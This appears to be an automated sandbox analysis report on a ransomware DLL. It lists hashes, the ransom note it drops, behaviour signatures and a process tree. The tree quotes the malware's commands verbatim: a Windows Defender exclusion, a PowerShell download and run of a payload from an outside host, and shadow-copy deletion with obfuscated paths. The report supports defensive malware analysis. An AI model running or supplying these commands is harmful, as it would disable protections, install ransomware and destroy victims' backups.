Resubmissions

15-12-2024 15:31

241215-syg9xaykdx 8

15-12-2024 08:28

241215-kc625synes 10

Analysis

  • max time kernel
    93s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-12-2024 08:28

General

  • Target

    fccd129f6a5b9d2133d14922a3614f02.dll

  • Size

    206KB

  • MD5

    fccd129f6a5b9d2133d14922a3614f02

  • SHA1

    e814c637e6f0c21f3aa9b43fb92cb161b4d451fc

  • SHA256

    4b4a87552c44158fb53a72c7294319b0ddde9f99f460425ad5997d3b9121cd1e

  • SHA512

    c1594504053bbe2b061880d1ff69819eca8bdd2bc882b74f415ff8a1515389e32b8d7cd1b931d65b042247fd05df1751a000d6da4219427b74e9cdb0e0e52979

  • SSDEEP

    3072:4pEegLluZoATP/QGdqlhNFIkiFnZDJVvU1nSXZOAg0Fuj0pJgOgpQkV+tpMEaE:4pDyp2AQq3FWFnRehAOXpQkY7MY

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\Decryptfiles.txt

Ransom Note
ATTENTION! Don't worry, you can return your files! All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key. The only method of recovering files is to purchase a decrypt tool and your key. Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned. We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision. Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours. Contact us email :[email protected] -> [email protected] Attach this file in the email. ID :3A6589530BE47A549270C7F4D66B57C9187123FC77CEFA4E1E77FEFD9609284B3C54DE304EF0C55058ED467F3FE875CF439341C6D7BA79AB5DB8FF34595E668B9EA5A5A109A8E916BF8F5853D261239B32D10921C3BA1A4BD228A3E38311E9C94A80574BFCAABB3E68F52B12856825FC383037D0FC56B79C84D6FF619844E01E538CCF3F16678EF3015029089335290850B4F54B0FD30659F0DBEBED583588D65A3C0895A7070B8EBD614058AF6CC620E30C1382059C93AD2B79E17B315121814BD3629AB4EDD86B447BE315199E6ABE45F387E5B9769BBF907FEDF3C9F4AF54D700CA612727A97EA5B30D23FFC67EF48C429B02AAF3FBEFB9C66D8AC19711B7E5A63B161E7C8CFF183FE8F103C9C713D500F191EBB98F6998FA1AEBE72BB36968DC6AD6523A1B52FA36A836C73DA3351F69E7CA90B6E2817F6F6E6CA241C2F6D7FA05D79DCA5FA4202528A961A2964F8FF42E2C20D5CA7CE39125DCD2FB78B149FD97CE206B557D8102658710DEA032C289E3EA6CF495909705CDCF67E878A22379C51E4F0386E1523DA79780C27ACD74746BFDA5A47E8664ABBF4CF44F67B998985E4A33650E3E49BFF0B3892C931B8408ED1AE4F17E4B3FCD03A94BFC6D55F9D47D5593B2876661D088B8334E01328EC7AB8D58A62BDD98E1ACFF2FA8586477232E5514D9D60C579C5799C0A970631A8A0F14C77B1F96CD87BEAB303E9A3D964DE48037F0AD31A95725A94671F9E6AA0D004E45CFE3DE12D993E2E6B52A687EEC17E89147E589016420A36C5F2AF8BD284732420C99F48DBDFE66DA700A122C4E9AE7F6B379F79C28DB56074ED1B076E24934E58EC8050598759491712B0E3F666AF227311B76840EF15CCF6F7C5D68920F66CD34E0BDE10F8FDB2C206C9D4EDCDFA20AC7DA989D2438224CA08BA9368E0109739CE505603B91E257658F27DA281EF3AC10FA666506B423FD47B356A799347118B74CE3025DA2D45CC78CF7537854F0D1361BB7A6DF78E6762389173715977A05F7634A2D1B06C34E4C370423ACC6F46D437F8F0B972EE59509F590FE1528599124EA93BBFCD382F72C74E99B57E9C8BC6CDE19ED9DF8706C81127848EEEA8E8F0DBD93FBA3953CEE06CA179B881B2D2EF31D7CC39590B54F457191E2D53A6BF69A1F9CD900B47370E4560D889F6FD983515A4A64E9F954186890C54A91DB097674A13E5A487CFFF7FB0EB77BF3551FE1A028ADFB40F1EE40EE6BB3B91FDDD4D0349E2FE17BE099F5F8EF3409E1C85D5C10787BAA21701145DF51210416159132FBFC6DE26DD5E2EB337485C2679F4E3A034FB6E652DA77E1E43BC120CF13A8393B3A42C1A0236C545187F0ED6C721A3AEB1A0495248AF8901D8889190F90AA9090A853FFF6CCE843A3D9CB459036E5EF5997AAA316170AE4F1FBE15C172DAD85DE00112749C6D3F16FFE4511DE3A34CFA23E473DA77450D348126460959C1ECB524E550F9A8893598CFCAEDE3A79D628060CE342522EADB6FCAC2B19CB13DF056E7947B8AA066147E9179AD23AC759471861A93A56125EDA5F07E05964A5AA0436F34DAE510D4887D700E8B0C73F0DECFFF9B1A0F4A8AE6CE0BA97CD5A9553894F2174397B3B47DE5FFC016CAB16C965BCB15166DCBD84AA4D67544CE34C7A7A35BA8F1E4506C6DE7CC35DD97C82594B0C39B3CF8044CD6B15614CD2E8BB2476E9E8750721850D654B15E0947ECA275CFBCEAD256D819C215E72DDC1AE42DD6BE819462B4D3B05D8D78489F33C6FDD82FB52D231149F7D25640964AEE1D2D0AFD5B911016921386DD49787AE1BC06F0B8420D6A110C3D93CB0CBD1BBE426E5A7F19894A5803C1F0D473CDDEDA569078C633A3BDFDABD00D5DFFCD1031F55289BDF939A8AFB234E214E5AA3330E4966605B9C07D52AC58A8BDE928C1D68CEE1FFA4F0E3614784FF7FAF287F14D8DADDD5BC9DFBE0628F72D0B295D186FC6BA3992EDE8DBDBC31C598943C6D841980583E5AA9842429204B167E3BD7B75F8B548F63540249E524D1A94CF0A9AF148D59F744AE05DD6B72A8EE25847952761E17D317124EC4D43EE146AD09A3A618A9C0EDE23C7D631BCA1C6643F3F898BB10E2A5E3C93267552EC9F3AE9A947FAF97D5D26846B668CD2F168690774D0B4F408C62893A7567720BEEC065DC483B5163349F22C83B55719228DF8732A6CADA90A4509287F2C5BBE44E014EEF7EADDB69BF85ECA0491971EA810F3EE91425BC0C005A02F5F2BCAF18B7E1E51EE5D8D788C44F58AEDD3E4BAA50C8C01735F11BA0757963309B960531BBAA9EDCAF569B3705269E11DBD8343CF3C0DC0E2A10F355D652D38BFFDC24C3F1841D7574078CB78199EFC178843C7E

Signatures

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops desktop.ini file(s) 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\fccd129f6a5b9d2133d14922a3614f02.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1884
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\fccd129f6a5b9d2133d14922a3614f02.dll,#1
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3928
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:764
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4612
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3400
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3624
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c %temp%/eryy65ty.exe
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:544
        • C:\Users\Admin\AppData\Local\Temp\eryy65ty.exe
          C:\Users\Admin\AppData\Local\Temp/eryy65ty.exe
          4⤵
          • Drops startup file
          • Executes dropped EXE
          • Adds Run key to start application
          • Drops desktop.ini file(s)
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2152
          • \??\c:\Windows\system32\wbem\wmic.exe
            c:\OutvgQ\Outv\..\..\Windows\Outv\Outv\..\..\system32\Outv\Outv\..\..\wbem\Outv\Outvg\..\..\wmic.exe shadowcopy delete
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3528
          • \??\c:\Windows\system32\wbem\wmic.exe
            c:\nqQsTX\nqQs\..\..\Windows\nqQs\nqQs\..\..\system32\nqQs\nqQs\..\..\wbem\nqQs\nqQsT\..\..\wmic.exe shadowcopy delete
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2144
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\eryy65ty.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Suspicious use of WriteProcessMemory
            PID:3416
            • C:\Windows\SysWOW64\PING.EXE
              ping 1.1.1.1 -n 1 -w 3000
              6⤵
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:3112
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1648

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    968cb9309758126772781b83adb8a28f

    SHA1

    8da30e71accf186b2ba11da1797cf67f8f78b47c

    SHA256

    92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

    SHA512

    4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    16KB

    MD5

    d3c6131a7627d8766176cd39e2f98b60

    SHA1

    bfb33abe9dcbcc6a9822a8032d45c85d710fc5f8

    SHA256

    1e09df3e0b71710f0f68b3559312bf99a9f15be6a5ba90f5c9d10c091f7a5543

    SHA512

    f49525731fa468141a51d6d12e409670eeb41a1a85f3de9b1f84e3563c0b38fe0318fd91589ac4cc6d5823c701abe836c4742a03564dea81cabe9093a3a1c91f

  • C:\Users\Admin\AppData\Local\Temp\Decryptfiles.txt

    Filesize

    4KB

    MD5

    803bcafa81499808f26d9a23d84a4c60

    SHA1

    237ba364c76f799fc4073272bdfe5cd16eb9047b

    SHA256

    2d95261dd0a05899148e9eaa7efb937cc53a3ad4ba8f7650d32fd0e14c08c7b6

    SHA512

    0f5aa6ce70bf2249ea08871e65039720575c205a5c7eba3327f6c573ccd6ce8715020b268ef5af71c4ddb75e31e6319be839e4dd4fffd172fe71ae4533ffd3ba

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cqof04mp.p3h.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\eryy65ty.exe

    Filesize

    881KB

    MD5

    9049faba5517305c44bd5f28398fb6b9

    SHA1

    036c6b32f3e7d7d689c9b4d482091eebcc669bfa

    SHA256

    d2100ffe58eb50c05d97a3da738ccd1f0be9672c057c26a10140af80595b78c3

    SHA512

    65a33506f970675775468f80b94a3f8bb2d3672e6fb08fc9f2e5107020095ca6d4bca927c59b72488e2ef4208a64a56ced7511ea14c0445cd50ea3ff9b827f6a

  • memory/3624-49-0x0000000006070000-0x00000000063C4000-memory.dmp

    Filesize

    3.3MB

  • memory/4612-20-0x00000000077C0000-0x00000000077F2000-memory.dmp

    Filesize

    200KB

  • memory/4612-36-0x0000000008180000-0x00000000087FA000-memory.dmp

    Filesize

    6.5MB

  • memory/4612-16-0x0000000074DE0000-0x0000000075590000-memory.dmp

    Filesize

    7.7MB

  • memory/4612-17-0x00000000061D0000-0x0000000006524000-memory.dmp

    Filesize

    3.3MB

  • memory/4612-18-0x00000000067F0000-0x000000000680E000-memory.dmp

    Filesize

    120KB

  • memory/4612-19-0x0000000006840000-0x000000000688C000-memory.dmp

    Filesize

    304KB

  • memory/4612-21-0x0000000070C00000-0x0000000070C4C000-memory.dmp

    Filesize

    304KB

  • memory/4612-32-0x0000000006DE0000-0x0000000006DFE000-memory.dmp

    Filesize

    120KB

  • memory/4612-33-0x0000000074DE0000-0x0000000075590000-memory.dmp

    Filesize

    7.7MB

  • memory/4612-31-0x0000000074DE0000-0x0000000075590000-memory.dmp

    Filesize

    7.7MB

  • memory/4612-0-0x0000000074DEE000-0x0000000074DEF000-memory.dmp

    Filesize

    4KB

  • memory/4612-34-0x0000000074DE0000-0x0000000075590000-memory.dmp

    Filesize

    7.7MB

  • memory/4612-35-0x0000000007800000-0x00000000078A3000-memory.dmp

    Filesize

    652KB

  • memory/4612-6-0x00000000060A0000-0x0000000006106000-memory.dmp

    Filesize

    408KB

  • memory/4612-37-0x0000000007B30000-0x0000000007B4A000-memory.dmp

    Filesize

    104KB

  • memory/4612-38-0x0000000007BB0000-0x0000000007BBA000-memory.dmp

    Filesize

    40KB

  • memory/4612-39-0x0000000007DB0000-0x0000000007E46000-memory.dmp

    Filesize

    600KB

  • memory/4612-40-0x0000000007D70000-0x0000000007D81000-memory.dmp

    Filesize

    68KB

  • memory/4612-41-0x0000000007D90000-0x0000000007D9E000-memory.dmp

    Filesize

    56KB

  • memory/4612-42-0x0000000007E50000-0x0000000007E64000-memory.dmp

    Filesize

    80KB

  • memory/4612-43-0x0000000007E90000-0x0000000007EAA000-memory.dmp

    Filesize

    104KB

  • memory/4612-44-0x0000000007E70000-0x0000000007E78000-memory.dmp

    Filesize

    32KB

  • memory/4612-47-0x0000000074DE0000-0x0000000075590000-memory.dmp

    Filesize

    7.7MB

  • memory/4612-5-0x00000000059F0000-0x0000000005A56000-memory.dmp

    Filesize

    408KB

  • memory/4612-4-0x0000000005950000-0x0000000005972000-memory.dmp

    Filesize

    136KB

  • memory/4612-2-0x0000000005A70000-0x0000000006098000-memory.dmp

    Filesize

    6.2MB

  • memory/4612-3-0x0000000074DE0000-0x0000000075590000-memory.dmp

    Filesize

    7.7MB

  • memory/4612-1-0x0000000005270000-0x00000000052A6000-memory.dmp

    Filesize

    216KB